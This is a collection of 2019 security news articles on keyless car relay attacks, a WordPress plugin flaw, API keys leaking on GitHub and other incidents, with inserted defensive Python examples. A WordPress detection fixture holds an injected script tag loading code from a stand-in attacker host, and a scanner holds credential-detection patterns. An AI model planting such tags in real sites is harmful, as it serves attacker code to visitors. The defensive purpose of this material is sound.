STE WILLIAMS

Dark Reading’s Kelly Jackson Higgins Honored as Top Cybersecurity Journalist

In voting conducted by the SANS Institute, Jackson Higgins is named by peers as one of the top 10 journalists in the industry.

Dark Reading executive editor Kelly Jackson Higgins has been named a Top 10 Cybersecurity Journalist in voting conducted by the SANS Institute earlier this month.

The 10 award winners were selected from a field of more than 100 journalists through a multistep nomination and voting process among active journalists. The awards recognize the full body of work contributed by each journalist during 2018. Dark Reading staff editor Kelly Sheridan was also a nominee.

Jackson Higgins won the Top Ten award the last two times the SANS Institute conducted the voting, in 2014 and 2012.

A veteran of more than two decades of IT journalism, Jackson Higgins has worked for Dark Reading since its inaugural year, 2006. Before that, she covered a range of IT technologies for publications including Network Computing, Secure Enterprise Magazine, and CommunicationsWeek.


Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/dark-readings-kelly-jackson-higgins-honored-as-top-cybersecurity-journalist/d/d-id/1334238?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

IT Leaders, Employees Divided on Data Security

Execs and employees have dramatically different ideas of how much information is being lost and why – a gap that puts enterprise data in grave danger.

Management and employees have dramatically different views of how risky employee behavior can be. According to the results of a new security survey released today, that gap puts enterprise data in grave danger.

The survey, conducted by Opinion Matters and sponsored by Egress, includes the views of more than 250 IT leaders and more than 2,000 employees from the US and UK. It found more than three-quarters of the executives believe employees have accidentally put company data at risk in the past year. When employees answered the same question, 92% said they had not done anything to put data at risk.

When it comes to intentional breaches, the division is no less stark. Sixty-one percent of IT leaders said employees have maliciously put company data at risk, while 91% of employees said they’ve done no such thing. This kind of divide, in which employees are unaware of, or unwilling to admit, their roles in data loss, poses a particular challenge to IT leaders trying to educate their employees about good security practices.

There is more information within the data. For example, more than half (55%) of employees who admitted breaking company rules to share data said their organizations don’t provide the tools required to securely share sensitive information. In addition, 29% of employees said they believe they have some form of ownership over data they have worked on as part of their jobs. This echoes another finding, that 20% of those who intentionally shared data did so because they felt that the information was theirs to share.

Read more here.


Article source: https://www.darkreading.com/vulnerabilities---threats/insider-threats/it-leaders-employees-divided-on-data-security/d/d-id/1334241?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New ratings point to keyless cars that can stand up to relay attacks

Do you dislike the idea of standing in an empty driveway that should be occupied by your car, obediently waiting to unlock after you chirp-chirp your keyfob at it?

If so, you might want to take a gander at the security ratings for new cars put out by Thatcham Research, a nonprofit research centre in the UK funded by motor insurers.

Thatcham rated 11 cars that were launched so far in 2019 and plans to continue to assess new cars for security. It rated six of those 11 cars as being poor for security.

Specifically, it’s looking at those wireless keys: matchbox-sized fobs that have proven woefully susceptible to what’s known as relay attacks.

In a relay attack, thieves use a pair of cheap relay devices, easily bought online, to stretch the short-range conversation between car and fob through walls, doors and windows to the fob sitting inside the owner’s house. One device, held next to the car, picks up the car’s low-power “is my key nearby?” signal and forwards it to the second device near the house; that device replays the signal to the fob, and the fob’s answer is relayed back the same way.

Nothing is broken cryptographically: car and fob each see exactly the messages they expect. The car simply concludes the key is within arm’s reach, unlocks, and the thieves hop in and drive off.

Is your car a wireless sitting duck?

When the German General Automobile Club (ADAC) tested 237 keyless cars from 30 brands in January this year, it found that nearly all of them – 230 – are vulnerable to relay attack.

In the ADAC’s research, the only cars that fully resisted the attack came from Jaguar Land Rover: the Jaguar I-Pace, plus the latest versions of the Land Rover Discovery and Range Rover Evoque. Four other cars could be either unlocked or started, but not both, and the remaining 230 vehicles were fully vulnerable: they could be both unlocked and started.

For its part, Thatcham got good results from the Audi E-tron, Jaguar XE, Range Rover Evoque and Mercedes-Benz B-Class: cars whose fobs resist the attack either by using more secure wireless technology that lets the car judge how far away the fob really is, or by putting the fob to sleep when it hasn’t moved for a set time.
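To make the mechanics concrete, here is an added example (mine, not code from Thatcham, ADAC or any carmaker) that simulates a passive keyless entry handshake in Python: the car sends a random challenge, the fob answers with a keyed hash, and the thieves’ two boxes simply forward both messages unchanged. The shared key, the timings and the 10 microsecond limit are illustrative assumptions. The two defences modelled correspond to the ones above: a round-trip-time bound (one way a car can judge how far away the fob really is) and a fob that stops answering after lying still for a set period.

```python
"""Simulated passive keyless entry: challenge/response, a relay attack, two defences.

Added example for this page, not code from Thatcham, ADAC or any carmaker. The
protocol, shared key, timings and thresholds are illustrative assumptions, and
time is simulated rather than measured.
"""
import hashlib
import hmac
import os

SHARED_KEY = b"constructed-demo-key-not-a-real-car-key"  # assumption: symmetric key in car and fob
LIGHT_M_PER_US = 300.0   # radio covers roughly 300 m per microsecond
FOB_COMPUTE_US = 2.0     # assumed time for the fob to compute its answer


class Fob:
    """Answers the car's challenge with an HMAC over it, unless it has gone to sleep."""

    def __init__(self, key, sleep_after_us=None):
        self.key = key
        self.sleep_after_us = sleep_after_us  # None: never sleeps (the vulnerable design)
        self.idle_us = 0.0                    # simulated time since the fob last moved

    def rest(self, us):
        """The fob lies still (on a hall table, say) for `us` microseconds."""
        self.idle_us += us

    def respond(self, challenge):
        if self.sleep_after_us is not None and self.idle_us >= self.sleep_after_us:
            return None                       # motion sleep: ignore polls while stationary
        return hmac.new(self.key, challenge, hashlib.sha256).digest()


class Car:
    """Issues a random challenge and checks the answer; optionally bounds the round trip."""

    def __init__(self, key, max_rtt_us=None):
        self.key = key
        self.max_rtt_us = max_rtt_us          # None: accept any delay (the vulnerable design)

    def challenge(self):
        return os.urandom(16)

    def verify(self, challenge, response, rtt_us):
        if response is None:
            return False
        expected = hmac.new(self.key, challenge, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, response):
            return False
        # Distance bounding: a fob that is really nearby answers within a few microseconds.
        return self.max_rtt_us is None or rtt_us <= self.max_rtt_us


def unlock_attempt(car, fob, distance_m, relay_hops=0, relay_latency_us=0.0):
    """One poll. Legitimate use: small distance_m, no relay hops. Relay attack: the
    thieves' boxes forward challenge and answer unchanged, so the HMAC checks out,
    but every hop adds latency and the fob is much further away than it looks."""
    c = car.challenge()
    r = fob.respond(c)                        # the fob cannot tell who is really asking
    rtt_us = 2 * distance_m / LIGHT_M_PER_US + FOB_COMPUTE_US + relay_hops * relay_latency_us
    return car.verify(c, r, rtt_us)


def demo():
    """Map each scenario to whether the car unlocked."""
    attack = dict(distance_m=30.0, relay_hops=2, relay_latency_us=50.0)  # fob 30 m away indoors
    results = {}
    results["owner_no_defence"] = unlock_attempt(Car(SHARED_KEY), Fob(SHARED_KEY), 1.0)
    results["relay_no_defence"] = unlock_attempt(Car(SHARED_KEY), Fob(SHARED_KEY), **attack)
    # Defence 1: refuse answers that arrive later than a genuinely nearby fob could manage.
    bounded = Car(SHARED_KEY, max_rtt_us=10.0)
    results["owner_with_bound"] = unlock_attempt(bounded, Fob(SHARED_KEY), 1.0)
    results["relay_with_bound"] = unlock_attempt(bounded, Fob(SHARED_KEY), **attack)
    # Defence 2: a fob that stops answering after lying still for five minutes.
    sleepy = Fob(SHARED_KEY, sleep_after_us=5 * 60 * 1_000_000)
    sleepy.rest(8 * 60 * 1_000_000)           # left on the hall table overnight
    results["relay_sleeping_fob"] = unlock_attempt(Car(SHARED_KEY), sleepy, **attack)
    return results


if __name__ == "__main__":
    for name, unlocked in demo().items():
        print(f"{name:20s} -> {'UNLOCKED' if unlocked else 'refused'}")
```

The point the simulation makes is that the HMAC is never the weak link: with no timing check the relayed answer is accepted exactly like the owner’s, and only a defence that measures distance (here, a crude round-trip bound) or removes the fob from the conversation (motion sleep) changes the outcome. Real cars that pass Thatcham’s test use proper ranging radios rather than a single microsecond threshold, but the logic is the same.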

Thatcham Research chief technical officer Richard Billyeald told WhatCar? that Thatcham focused on relay attacks because they’re so good at blowing past whatever car manufacturers have done to boost security:

We’re focusing on keyless theft in particular because it gives thieves the ability to bypass 20 years of security improvements in a matter of seconds.

To be precise, that’s about 60 to 90 seconds, as recent car thefts have shown.

From zero to “poof!” in 60-90 seconds

CCTV footage of a relay attack captured in the UK in December 2017 shows one of the thieves standing near the victim’s property, waving a relay device until he picks up a signal from a key fob inside the house or garage. The other thief stands next to the car with his own relay box, which receives the signal from the box near the property. The car sees what looks like a nearby key and obligingly unlocks the door.

That one took about 60 seconds. This past November, the theft of a Volvo from a London couple took around 90 seconds, as we know from footage captured by a camera the couple had installed after the same thing happened to the same type of car a year earlier.

Not everybody’s a fan of the ratings

WhatCar? reports that the Society of Motor Manufacturers and Traders (SMMT) isn’t a big fan of Thatcham’s new ratings. It quoted CEO Mike Hawes, who seems to think that security through obscurity is a better approach:

It confuses rather than simplifies a very complex issue and will not help consumers, rather offering a signpost to thieves and increasing the risk of targeted criminal activity.

Hawes defended the auto industry’s work on this:

New cars are more secure than ever, and the latest technology has helped bring down theft dramatically with, on average, less than 0.3% of the cars on our roads stolen.

Criminals will always look for new ways to steal cars; it’s an ongoing battle and why manufacturers continue to invest billions in ever more sophisticated security features.

That’s good to hear. Still, if it were me staring at the empty driveway where I left my second new Volvo the night before, I’d be quite interested in hearing which car brands have come up with ways to thwart relay attacks.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MY05ThVYZAI/

Update now! WordPress hackers target Easy WP SMTP plugin

Two hacking groups have been spotted targeting websites running unpatched versions of the WordPress plugin Easy WP SMTP.

Easy WP SMTP, which has more than 300,000 installs, lets WordPress sites route their outbound email through a reputable SMTP server rather than the web host’s own mail function, so that their messages aren’t spamholed by suspicious email providers.

Unfortunately, version 1.3.9 is vulnerable to a flaw that lets any logged-in user trigger the plugin’s settings import. Attackers have used it to set up ordinary subscriber accounts with hidden admin powers, or to hijack sites to serve malicious redirects.

According to Defiant, the company behind the Wordfence WordPress firewall, the problem lies with the Import/Export functionality added in 1.3.9:

The new code resides in the plugin’s admin_init hook, which executes in wp-admin/ scripts like admin-ajax.php and admin-post.php.

This does not check the user capability, which means any logged-in user, including a subscriber, could trigger it.

It’s not clear from the plugin changelog how long 1.3.9 has been in use, but a second firewall company, Ninja Technologies, said it has seen attacks exploiting the weakness “since at least March 15.”

One campaign appears to be exploiting the vulnerability to grab admin privileges, while a second sends visitors to malicious sites before…

Injecting malicious script tags into all PHP files on the affected site with the string “index” present in their name. This obviously affects files named index.php, but also happens to impact files like class-link-reindex-post-service.php, present in Yoast’s SEO plugin.

How widely exploited is this flaw?

The last dozen or so comments on the plugin’s support forum are from users who claim their sites were targeted. Although these can’t be verified, one of them claimed to have lost “10 client sites in 3 days.”

What to do

What admins do next depends on whether they believe their site has been targeted or not.

Defiant offers a long list of possible indicators of compromise (IoCs) in its blog post. If you see none of them, update to version 1.3.9.1 as an urgent priority, then change the WordPress and SMTP passwords and check the user list for accounts, especially administrators, that you don’t recognise.

If you think your site might have been targeted, the recommended action is to restore it from a pre-compromise backup first, then apply the update and change those passwords.

If no backup is available, the plugin’s developers offer instructions for manually cleaning a site before turning on automatic or scheduled backups as a future defence.
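If you want to check a site for the specific pattern described above (script tags planted in PHP files with “index” in their name), here is an added example in Python, mine rather than Defiant’s, Ninja Technologies’ or the plugin authors’ tooling. It builds a small constructed WordPress tree in a temporary directory, with a placeholder tag standing in for the real campaign’s payload, and reports every <script> tag found in matching files along with its line number.

```python
"""Hunt for <script> tags planted in PHP files whose names contain "index".

Added example for this page; it is not Defiant's, Ninja Technologies' or the plugin
authors' tool. The site tree below is constructed for the demo and the injected tag
is a placeholder, not the real campaign's payload.
"""
import os
import re
import tempfile

SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)


def find_script_tags_in_index_files(root):
    """Walk a WordPress install and return sorted (relative_path, line_no, tag) for
    every <script ...> opening tag inside a .php file whose name contains "index"."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith(".php") or "index" not in name.lower():
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for m in SCRIPT_TAG.finditer(text):
                line_no = text.count("\n", 0, m.start()) + 1
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, line_no, m.group(0)))
    return sorted(hits)


INJECTED_OPEN = '<script src="https://attacker.invalid/r.js">'   # constructed placeholder
INJECTED = INJECTED_OPEN + "</script>"

# Constructed site tree: two files that should be flagged, two that should not.
CONSTRUCTED_SITE = {
    # Root index.php with the tag prepended above the PHP open tag: flagged.
    "index.php": INJECTED + "\n<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
    # The Yoast file mentioned above; "reindex" contains "index": flagged.
    "wp-content/plugins/wordpress-seo/src/services/class-link-reindex-post-service.php":
        "<?php\nclass Link_Reindex_Post_Service {}\n" + INJECTED + "\n",
    # Clean theme index.php: no hit.
    "wp-content/themes/demo/index.php": "<?php get_header(); ?>\n<main></main>\n<?php get_footer(); ?>\n",
    # Infected, but its name lacks "index": outside this campaign's pattern, so not flagged here.
    "wp-load.php": "<?php\n" + INJECTED + "\n",
}


def build_constructed_site():
    """Write CONSTRUCTED_SITE into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-ioc-demo-")
    for rel, content in CONSTRUCTED_SITE.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Build the constructed site and scan it."""
    return find_script_tags_in_index_files(build_constructed_site())


if __name__ == "__main__":
    for rel, line_no, tag in demo():
        print(f"{rel}:{line_no}: {tag}")
```

Point it at a real install with find_script_tags_in_index_files('/var/www/html'). Theme index.php files legitimately contain HTML, so treat hits as leads to inspect rather than proof of compromise, and remember that a confirmed compromise is handled by restoring from a pre-compromise backup, as above, not by deleting the tags and hoping.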

Last week it was users of the Abandoned Cart for WooCommerce plugin who were being urged to update as soon as possible. The moral of these stories is that diligent updating of plugins has become an important part of securing any site.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/FgOGdk1Gh3M/

Thousands of API and cryptographic keys leaking on GitHub every day

Researchers have found that one of the most popular source code hosting services in the world is still housing thousands of publicly accessible secret keys.

More than 100,000 repositories (repos) on GitHub contain secret access keys that can give attackers privileged access to those repos or to the online services the keys were issued for.

Researchers at North Carolina State University (NCSU) scanned almost 13% of GitHub’s public repositories over nearly six months. In a paper revealing the findings, they said:

We find that not only is secret leakage pervasive – affecting over 100,000 repositories – but that thousands of new, unique secrets are leaked every day.

The credentials developers routinely publish in their GitHub repos fall into several categories. One is SSH private keys, which let their holder log in to servers and services without a password. Another is application programming interface (API) keys, also known as tokens: strings that let a program call online services ranging from Twitter to Google Search on the key owner’s behalf. The researchers found a mixture of these for services including Google, Twitter, Amazon Web Services, Facebook, MailChimp, online telephony service Twilio, and credit card processors Stripe, Square, and Braintree.

These leaks sometimes compromised high-value targets. The researchers found Amazon Web Service (AWS) credentials for a large website serving millions of US college applicants. They also found AWS credentials for the website of a major government agency in a Western European country.

How does it happen?

Developers sometimes get careless when updating the code on their machines and sending it to GitHub, which they typically do with git’s command-line commit and push operations.

Coders sometimes keep SSH keys and API keys in the same directory as their source code, so the keys get swept up in the commit and push. It’s an easy mistake to make with SSH keys, which developers often generate from the command line. Other mishaps are even more facepalm-worthy, such as embedding API keys directly in source code.

One way to keep private keys out of a repo is to list their paths in a .gitignore file, which tells git not to track matching files. The .gitignore file itself is normally committed, though, and some developers pasted their secrets straight into it, so the secrets went up with the rest of the repo.

Some services, including those that use OAuth, require more than one secret for access, such as a client ID plus a client secret. That provided little extra protection here: four in five of the repos holding one of those secrets also contained the other piece needed to access the third-party service.

Many developers did nothing when notified of the problem, according to the paper. Those who tried to fix it tended to make a new commit that removed the secret from the file. That doesn’t work, because git keeps every past commit: the secret disappears from the latest version of the file but stays in the repo’s history, where anyone can still retrieve it.

What devs really need to do is either rewrite their history to remove the offending commit, or delete the entire repo and start again without storing the secret, said the researchers. Most people did neither. And since anyone could have copied the key while it was public, a leaked credential should be treated as compromised and revoked or rotated at the service that issued it, whatever happens to the repo.
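As an added example (mine, not the researchers’ tool and not GitHub’s scanner), the script below runs simple secret detection over every revision of a small constructed repository history, covering both failure modes above: commit 0 leaks an AWS access key ID and a high-entropy API secret in config.py, an SSH private key file, and a Google API key pasted into .gitignore; commit 1 deletes the key file and reads the secrets from the environment. Scanning only the latest snapshot finds one of the four; scanning the history finds them all. The regexes are my approximations of publicly documented key formats, the 3.5 bits-per-character entropy cut-off is an arbitrary assumption, and the AWS value is Amazon’s own documented placeholder ID rather than a real key.

```python
"""Scan every revision of a (constructed) repository history for leaked secrets.

Added example, not the NCSU researchers' tool and not GitHub's Token Scanning. The
regexes approximate well-known key formats, the entropy cut-off is an arbitrary
assumption, and the two-commit history below is constructed for the demo (the AWS
ID is Amazon's documented placeholder; every other value is made up).
"""
import math
import re
from collections import Counter

# Fixed-format credentials: match by shape.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "stripe_live_secret": re.compile(r"\bsk_live_[0-9A-Za-z]{24,}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
}
# Free-format secrets: a suspicious variable name followed by a long, random-looking value.
ASSIGNMENT = re.compile(
    r"(?i)(?:secret|token|password|api_key)\s*[:=]\s*['\"]?([A-Za-z0-9+/=_\-]{16,})")
ENTROPY_BITS_PER_CHAR = 3.5   # assumption: below this the value is probably a placeholder


def shannon_entropy(s):
    """Bits per character of the string's own symbol distribution."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(path, text):
    """Return (path, kind, matched_text) for every secret found in one file's contents."""
    hits = []
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((path, kind, m.group(0)))
    for m in ASSIGNMENT.finditer(text):
        value = m.group(1)
        if shannon_entropy(value) >= ENTROPY_BITS_PER_CHAR:
            hits.append((path, "high_entropy_assignment", value))
    return hits


def scan_snapshot(files):
    """files: {path: contents} for one commit (or the working tree)."""
    return [hit for path, text in sorted(files.items()) for hit in scan_text(path, text)]


def scan_history(commits):
    """commits: snapshots oldest first. Returns (commit_index, path, kind, matched_text)."""
    return [(i,) + hit for i, files in enumerate(commits) for hit in scan_snapshot(files)]


def kinds(findings):
    """Sorted, de-duplicated kinds of secret present in a findings list."""
    return sorted({f[-2] for f in findings})


# Constructed demo values. ljust pads the Google key to the 35 characters after "AIza".
GOOGLE_DEMO_KEY = "AIza" + "SyConstructedExampleKey".ljust(35, "0")
GITIGNORE = "deploy_key\n# old key: " + GOOGLE_DEMO_KEY + "\n"   # secret pasted into .gitignore

# Commit 0 leaks four secrets. Commit 1 "fixes" it by deleting the key file and reading
# the values from the environment, but the old blobs stay reachable via commit 0.
HISTORY = [
    {
        "config.py": (
            'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'   # Amazon's documented example ID
            'API_SECRET = "q7Rz9XpL2mVw4TnKs8Bd"\n'          # constructed, random-looking
            'DB_PASSWORD = "changemechangeme"\n'             # constructed placeholder, low entropy
        ),
        "deploy_key": "-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n-----END OPENSSH PRIVATE KEY-----\n",
        ".gitignore": GITIGNORE,
    },
    {
        "config.py": (
            "import os\n"
            'AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]\n'
            'API_SECRET = os.environ["API_SECRET"]\n'
            'DB_PASSWORD = os.environ["DB_PASSWORD"]\n'
        ),
        ".gitignore": GITIGNORE,
    },
]


if __name__ == "__main__":
    print("latest snapshot:", kinds(scan_snapshot(HISTORY[-1])))
    for commit, path, kind, _ in scan_history(HISTORY):
        print(f"commit {commit}: {path}: {kind}")
```

The placeholder password is deliberately left unreported: the entropy filter is what keeps a generic “password =” rule from drowning in dummy values, at the cost of missing genuinely weak real ones. The scan of the latest snapshot is what a developer eyeballing the working tree sees; the history scan is what anyone with the public repo sees, which is why a new commit that deletes the secret is not a fix.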

How did the researchers find these keys? Was it via some nefarious hack or loophole in the website? Nope – they just searched for it. GitHub has a search API that can be used to search across all its repos, and it happily delivers the secret key data.

Paper co-author Brad Reaves told us:

While we used the Search API, which requires an API key that can be obtained for free by any GitHub user, keys can also be found with the online search function.

This has been a problem since at least 2013, when GitHub shut down its search service for a while after finding secret keys turning up in searches. He added:

After this was publicized, GitHub took down the Code Search tool, claiming unrelated reasons, but shortly relaunched the tool with the same functionality.

So is all of this GitHub’s fault? Hardly. As Reaves pointed out:

Code search is a great tool, but it would be very difficult for GitHub to build a tool that censored all possible secrets; the burden is on developers not to post secrets to public repositories.

To its credit, GitHub, which Microsoft acquired for $7.5bn in a deal completed in October 2018, is trying to make things better. It introduced rate limits for its search tool, although the paper points out that an attacker could get around them by searching through multiple accounts. It has also been scanning repositories for several years to find GitHub OAuth tokens and personal access tokens, which can be used to access people’s GitHub repositories.

In October 2018, GitHub also announced partnerships with third-party online services as part of a new feature called Token Scanning. This scans new commits or private-turned-public repos for service providers’ API keys and notifies the appropriate service provider when it finds them. That service provider may then choose to revoke the credentials, which is the step GitHub recommends, according to a spokesperson there. She also told us that it has shared information on more than 100 million compromised tokens so far.

It’s a start, said Reaves, but GitHub’s work can only solve the problem up to a point:

I think efforts like GitHub’s Token Scanning project should be applauded, but they are only effective once a leak has already occurred. This problem also is likely not isolated to GitHub – it will affect any publicly available code. We need more research to develop systems that help developers avoid this mistake in the first place.

Kudos to GitHub for trying its best to solve the problem, but it’s up to developers to use services like this – and the associated tools like Git – properly.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xe2CEbq_Sx0/

Geiger counters are so last summer. Lasers can detect radioactive material too, y’know

Lasers could be used to detect radioactive material secretly transported to and from ports one day, according to a group of physicists from the University of Maryland in the US.

The boffins describe a proof-of-concept method that can sniff out the particles emitted from radioactive decay using a technique known as an “electron avalanche”. The process is a little complicated and contains multiple steps.

It begins with shining an infrared laser beam near a radioactive source. Radioactive material like uranium and thorium decays over time by ejecting alpha particles from its nucleus. The alpha particles can ionise nearby air molecules by robbing them of their electrons. The researchers call these free electrons “seed electrons”, as they quickly attach themselves to nearby oxygen molecules.

Here’s where the laser comes in. An infrared laser can detach those seed electrons from the oxygen molecules they are weakly bound to. The laser’s energy then accelerates the freed electrons, which collide with other molecules in the air and ionise them, creating an avalanche of free electrons.

“A simple view of avalanche is that after one collision, you have two electrons,” said Howard Milchberg, co-author of the paper published this month in Science Advances and a professor of physics and electrical and computer engineering at the University of Maryland (UMD). “Then, this happens again and you have four. Then the whole thing cascades until you have full ionization, where all atoms in the system have at least one electron removed.”

Now the air in the laser’s path is ionised, and that affects the photons in the beam: some are reflected and backscattered off the ionised air molecules and reach a silicon photodiode detector. Software processes the spectrum of the backscattered light to reveal the density of the seed electrons, which in turn indicates the level of radioactivity.


“If there is no radioactivity, there are no seed electrons so no avalanche breakdown occurs,” Robert Schwartz, first author of the paper and a physics graduate from UMD, told The Register. “When you introduce a radioactive source there are seed electrons so we can see the breakdown. It is a very sensitive technique. Sources as weak as 1 microgram of Cobalt-60 produce detectable levels of air ionization.”

At the moment the technique has only measured radioactive material from distances of up to one meter away, so it’s not really much of an improvement over current methods like using a Geiger counter yet.

But Schwartz reckoned that scaling up the process could increase that distance to ten meters or even 100 meters if a stronger laser pulse was used. “The benefit of our method is that it is inherently a remote process. With further development, it could detect radioactive material inside a box from the length of a football field.”

He believed that such a system could be fitted inside a van maybe in ten years’ time or so. “Anywhere you can park a truck, you can deploy such a system. This would provide a very powerful tool to monitor activity at ports.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/25/geiger_counter_lasers/

Slack slings crypto-keys at big biz, union gets worked over, VPN owners probed, trolls trouble vets, and more

Roundup This week we got freaked out about heart implant hacks, welcomed a new Microsoft security tool, and endured yet another Facebook fsck up.

Here’s what else happened along the way:

Slack pack give keys a whack

Large enterprise customers will now have more control over the security of their Slack channels.

This after the workplace chat giant announced it would let companies bring their own encryption keys to their Slack workspaces. The feature, called Enterprise Key Management, works through AWS: businesses keep their keys in AWS Key Management Service (KMS) and Slack uses those keys for the customer’s own workspace, so revoking a key in KMS cuts off Slack’s access to the data it protects.

“What actually makes the design of our system so unique is that, in the case of an incident let’s say, rather than revoking access to the entire product, admins can choose to revoke access in a very granular, highly targeted manner,” said Slack CSO Geoff Belknap.

“That granular revocation ensures that teams continue working while admins suss out any risks.”

Scare in Texas over hacked sirens

Earlier this month, residents in two Texas towns were awoken at 0230 when storm sirens suddenly went off. According to Dallas-area TV station CBS-DFW, authorities are convinced the late-night wailing was the work of hackers.

The station cites officials in the cities of DeSoto and Lancaster who report that an unknown person(s) were somehow able to get into the city’s network and trigger storm sirens across the two cities. This, in turn, prompted officials to shut down the emergency siren system for several days while the matter was sorted.

“Based on the widespread impact to the outdoor sirens located in two separate cities, including Lancaster, it has become evident that a person or persons with hostile intent deliberately targeted our combined outdoor warning siren network,” Lancaster city hall said.

“Sabotage against a public warning system is more than vandalism.”

Metal workers in deep sheet following data breach

A California division of the Sheet Metal Workers Union is sending out warnings to its members following the disclosure of a data breach related to equipment theft.

Local 104 told (PDF) the state Attorney General’s office that on February 5 one of its administrators had their car broken into.

Among the items stolen from the vehicle were a backpack, laptop, and a flash drive containing the names, driver’s license numbers, and social security numbers for members of the local union.

As a result, the union now says it will offer those who were exposed the standard two-year enrollment in a credit monitoring service. It is recommended that anyone who gets a notification letter from the union should keep a close eye on their bank statements and seriously consider enrolling in the monitoring service.

Spyware linked to journalist’s killing in Mexico

A journalist in Mexico suspected to have been murdered by a local drug cartel was also the subject of a targeted spyware campaign.

Citizen Lab reports that in the week after the killing of Javier Valdez, attempts were made to infect the phones of two of Valdez’ former colleagues, as well as his widow, Griselda Triana, with spyware. Researchers eventually linked the malware to an ongoing attempt by a government-connected group to monitor journalists with tools developed by the NSO Group.

“The spyware, developed by Israeli company NSO Group, is designed to infect and remotely monitor mobile phones,” the report notes.

“In that investigation, we linked the infection attempts to a group that we call RECKLESS-1, which we linked to the Mexican government.”

Pick a type of fraud: Chances are one of these two blokes engaged in it

Two US men have been convicted of carrying out a remarkable range of online and real-world fraud schemes.

The DOJ has announced guilty verdicts against two men who were found to have engaged in a series of scams ranging from dating to email compromise and even sham marriages.

Olufolajimi Abegunde and Javier Luis Ramos-Alonso were found to have engaged in, among other things, dating site “catfishing” scams where people were tricked into sending cash, money mule scams where marks were told to cash out stolen funds and send wire transfers, and even business email compromise attacks where funds were drained from companies.

Abegunde was also said to have helped launder the stolen cash through black market currency trades and helped support the whole thing by keeping two separate marriages.

“Abegunde was married during his studies at Texas A&M, but divorced his wife in 2016 to marry a US service member through whom he could obtain immigration and health care benefits and also open new bank accounts,” the DOJ said.

“He continued to live with his first wife in Atlanta while his US service member wife was deployed to South Korea.”

Trolls target veterans groups

In case you wondered how social media could get any more toxic and miserable, the US government is now worried that troll groups are targeting American veterans.

Rep Ted Lieu (D-CA) is calling on the FBI to open an investigation into suspected organized troll campaigns aimed at manipulating both veterans’ groups and those still serving in uniform.

The congressman says the troll farms are creating fake veterans’ groups, then using the bogus profiles to manipulate vets and service members much in the same way political groups did in the run-up to the 2016 election.

Meet the new VPN, same as the old VPN

Users looking to get a new VPN could be in for a shock when they find their old and new service are run by the same company.

A report from reviews site VPNPro shared with The Register examined 97 popular VPN products and found that all were the work of just 23 companies. In most instances, developers maintained multiple VPN apps.

Why is this a big deal? VPNPro researchers note that with so much consolidation, users have far less choice than they think, and by hiding the owners of an app the chances of being exposed to surveillance increase dramatically.

“If they are in Russia, China, and other authoritarian/repressive governments, they are forced to provide their data to the governments on a default basis,” the report notes.

“The parent company may also be willing to sell user data.”

Norsk Hydro bouncing back from ransomware attack

When last we left Norsk Hydro, the industrial and electric giant had disconnected much of its network in order to contain a ransomware attack.

A few days later, things are looking up for the company. A news update reports that most of Norsk Hydro’s business units have resumed normal activity, and staff have moved into the forensics phase of the incident, with Microsoft brought in to help investigators.

“There have been no reported safety incidents as a result of the cyber attack, and most operations are running, ensuring deliveries to customers according to specification, with some more manual operations than normal,” Norsk said.

“The attack has been reported to Norway’s National Investigation Service (Kripos) and the police have opened an investigation. Although progressing from day to day, it is still not clear how long it might take to restore stable IT operations.”

Meanwhile, chemical manufacturers Hexion and Momentive also appear to have been hit this month by the same, or a similar, file-scrambling nasty as the one that struck Norsk Hydro. The ransomware is believed to be LockerGoga.

Pwn2Own wraps up

The CanSecWest conference is winding down, and we now have a list of the winners from this year’s Pwn2Own contest.

The event pits researchers against a series of fully patched PCs, browsers, mobile devices, and even cars; the goal is to compromise and hijack the gear via previously unknown vulnerabilities. The first person or team to demonstrate a working zero-day exploit against a target, typically achieving remote code execution, takes home a big cash prize.

Below are some of this year’s big winners, as well as their payouts, after successfully hacking the following products:

  • Apple Safari: Amat Cama and Richard Zhu. $55,000.
  • Oracle VirtualBox: Amat Cama and Richard Zhu. $35,000.
  • Oracle VirtualBox: Phạm Hồng Phi. $35,000.
  • Oracle VirtualBox: Amat Cama and Richard Zhu. $35,000.
  • VMware Workstation: Amat Cama and Richard Zhu. $70,000.
  • Apple Safari: Niklas Baumstark, qwertyoruiop, Bruno Keith. $45,000.
  • Mozilla Firefox: Amat Cama and Richard Zhu. $50,000.
  • Microsoft Edge on VMware Workstation: Amat Cama and Richard Zhu. $130,000.
  • Mozilla Firefox: Niklas Baumstark. $40,000.
  • Microsoft Edge: Arthur Gerkis. $50,000.
  • Tesla Model 3: Amat Cama and Richard Zhu. $35,000.

